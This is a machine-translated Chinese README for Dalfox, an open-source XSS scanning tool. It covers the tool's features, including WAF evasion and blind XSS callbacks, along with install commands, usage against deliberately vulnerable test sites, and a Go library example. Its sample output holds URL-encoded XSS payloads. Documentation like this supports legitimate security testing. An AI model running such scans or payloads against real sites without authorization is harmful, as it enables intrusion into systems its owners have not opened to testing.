dalfox下載dalfox源代碼下載

Dalfox是一種強大的開源工具，專注於自動化，非常適合快速掃描XSS缺陷和分析參數。其先進的測試引擎和利基特徵旨在簡化檢測和驗證漏洞的過程。

至於這個名字，dal（달）是朝鮮語“月亮”的單詞，而“福克斯”代表“ XSS的Finder”還是？

關鍵功能

模式： url sxss pipe file server payload

班級	關鍵功能	描述
發現	參數分析	- 查找反映的參數 - 查找活著/不良特殊字符，活動處理程序和攻擊代碼 - 注射點（HTML/JS/屬性）的識別 `inHTML-none`
	靜態分析	- 檢查csp，xfo等的壞頭。
	BAV分析	- 測試BAV（基本的另一個漏洞），例如`sqli` `ssti` `open-redirects` ， `crlf` ， `esii`
	參數挖掘	- 在字典攻擊中找到新的參數（默認是GF-Patterns） - 支持自定義詞典文件（ `--mining-dict-word` ） - 與DOM一起找到新參數 - 使用遠程文字列表到採礦（ `--remote-wordlists` ）
	內置的格雷普	- 它標識SSTI，憑據，SQL錯誤等的基本信息洩漏等等
	WAF檢測和逃避	- 檢測到WAF（Web應用程序防火牆）。 - 如果找到WAF並使用特殊標誌，請使用緩慢的要求逃避 - `--waf-evasion`
掃描	XSS掃描	- 反射XSS /存儲的XSS / DOM XSS - DOM基礎驗證 - 無頭基驗證 - 用參數，標頭（ `-b` ， `--blind`選項）進行盲XSS測試 - 僅測試選定的參數（ `-p` ， `--param` ） - 僅測試參數分析（ `--only-discovery` ）
	友好管道	- 單個URL模式（ `dalfox url` ） - 從文件模式（ `dalfox file urls.txt` ） - 來自IO（管道）模式（ `dalfox pipe` ） - 來自RAW HTTP請求文件模式（ `dalfox file raw.txt --rawdata` ）
	有效載荷的優化查詢	- 通過抽象檢查注射點並產生適合有效載荷。 - 基於BadChar消除不必要的有效載荷
	編碼器	- 所有測試有效載荷（內置，您的自定義/盲人）均與編碼器並聯測試。 - 雙URL編碼器 - 到HTML十六進制編碼器
	順序	- 自動檢查存儲的XSS（ `--trigger` ）的特殊頁面 - 支持（ `--sequence` ）存儲的XSS選項，僅`sxss`模式
http	HTTP選項	- 覆蓋HTTP方法（ `-X` ， `--method` ） - 遵循重定向（ `--follow-redirects` ） - 添加標頭（ `-H` ， `--header` ） - 添加cookie（ `-C` ， `--cookie` ） - 添加用戶代理（ `--user-agent` ） - 設置超時（ `--timeout` ） - 設置延遲（ `--delay` ） - 設置代理（ `--proxy` ） - 設置`--ignore-return` return ） - 從原始請求加載cookie（ `--cookie-from-raw` ）
並行	工人	- 設置工人的號碼（ `-w` ， `--worker` ）
	n *主機	- 使用多播模式（ `--multicast` ），僅使用`file` / `pipe`模式
輸出	輸出	- 只有POC代碼和有用的信息作為Stdout寫 - 保存輸出（ `-o` ， `--output` ）
	格式	-JSON / PLAIN（ `--format` ）
	印刷	- 沉默模式（ `--silence` ） - 您可以選擇不打印`--no-color` color ） - 您可以選擇不打印`--no-spinner` ） - 您可以選擇僅顯示特殊的POC代碼（ `--only-poc` ）
	報告	- 顯示詳細報告（ `--report`和`--report-format=<plain/json>` ）
可擴展性	REST API	-API服務器和Swagger（ `dalfox server` ）
	有效載荷模式	- 生成XSS測試的有效載荷（ `dalfox payload` ）
	找到了行動	- 允許您指定檢測時要採取的動作。 - 例如（例如 - `--found-action` ）
	自定義Grepping	- 可以在響應時使用自定義的正則表達方式 - 如果重複檢測，它將執行重複數據刪除（ `--grep` ）
	自定義有效載荷	- 使用自定義有效載荷列表文件（ `--custom-payload` ） `--custom-alert-value` value ） - 自定義`--custom-alert-type` type ）
	遠程有效載荷	- 使用PortSwigger， `--remote-payloads`載箱等遠程有效載荷等。
包裹	軟件包管理器	-pkg.go.dev - 用水龍頭的自製 - 快照
	Docker Env	- Docker Hub -Docker的Github包裹
	其他	- github動作

以及測試所需的各種選項：D

如何安裝

使用自製（MACOS）

brew install dalfox

# https://formulae.brew.sh/formula/dalfox

使用Snapcraft（Ubuntu）

 sudo snap install dalfox

來自來源

go install github.com/hahwul/dalfox/v2@latest

# The actual release might slightly differ. This is because go install references the main branch.

更多信息？請閱讀安裝指南

用法

 dalfox [mode] [target] [flags]

單個目標模式

dalfox url http://testphp.vulnweb.com/listproducts.php ? cat = 123 & artist = 123 & asdf = ff 
	-b https://your-callback-url

文件中的多個目標模式

dalfox file urls_file --custom-payload ./mypayloads.txt

管道模式

cat urls_file | dalfox pipe -H " AuthToken: bbadsfkasdfadsf87 "

其他提示，有關詳細說明，請參見Wiki！

POC格式

樣品POC日誌

 [POC][G][BUILT-IN/dalfox-error-mysql/GET] http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123DalFox
[POC][V][GET] http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2Fclass%3D%22dalfox%22onLoad%3Dalert%2845%29%3E

格式

身份	類型	資訊	POC代碼
POC	g	內置/dalfox-error-mysql/get	http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123Dalfox
POC	r	得到	http://testphp.vulnweb.com/listproducts.php?artist=123＆asdf=ff&cat=123%22%22%3E%3E%3CSVG%2FCLASS%222222DALFOX;
POC	v	得到	http://testphp.vulnweb.com/listproducts.php?artist=123＆asdf=ff&cat=123%22%22%3E%3E%3CSVG%2FCLASS%222222DALFOX;

類型： G （GREP）， R （反映）， V （驗證）
信息：方法，grepping名稱等。

為什麼有差距？這是一種使僅通過剪切等解析POC代碼更容易的方法。例如，您可以執行此操作。

dalfox url http://testphp.vulnweb.com/listproducts.php ? cat = 123 & artist = 123 & asdf = ff 
	| cut -d " " -f 2 > output
cat output
# http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123DalFox
# http://testphp.vulnweb.com/listproducts.php?artist=123&asdf=ff&cat=123%22%3E%3Csvg%2FOnLoad%3D%22%60%24%7Bprompt%60%60%7D%60%22+class%3Ddalfox%3E

在代碼中

 package main

import (
	"fmt"

	dalfox "github.com/hahwul/dalfox/v2/lib"
)

func main () {
	opt := dalfox. Options {
		Cookie :     "ABCD=1234" ,
	}
	result , err := dalfox . NewScan (dalfox. Target {
		URL :     "https://xss-game.appspot.com/level1/frame" ,
		Method :  "GET" ,
		Options : opt ,
	})
	if err != nil {
		fmt . Println ( err )
	} else {
		fmt . Println ( result )
	}
}

go build -o xssapp ; ./xssapp
# [] [{V GET https://xss-game.appspot.com/level1/frame?query=%3Ciframe+srcdoc%3D%22%3Cinput+onauxclick%3Dprint%281%29%3E%22+class%3Ddalfox%3E%3C%2Fiframe%3E}] 2.618998247s 2021-07-11 10:59:26.508483153 +0900 KST m=+0.000794230 2021-07-11 10:59:29.127481217 +0900 KST m=+2.619792477}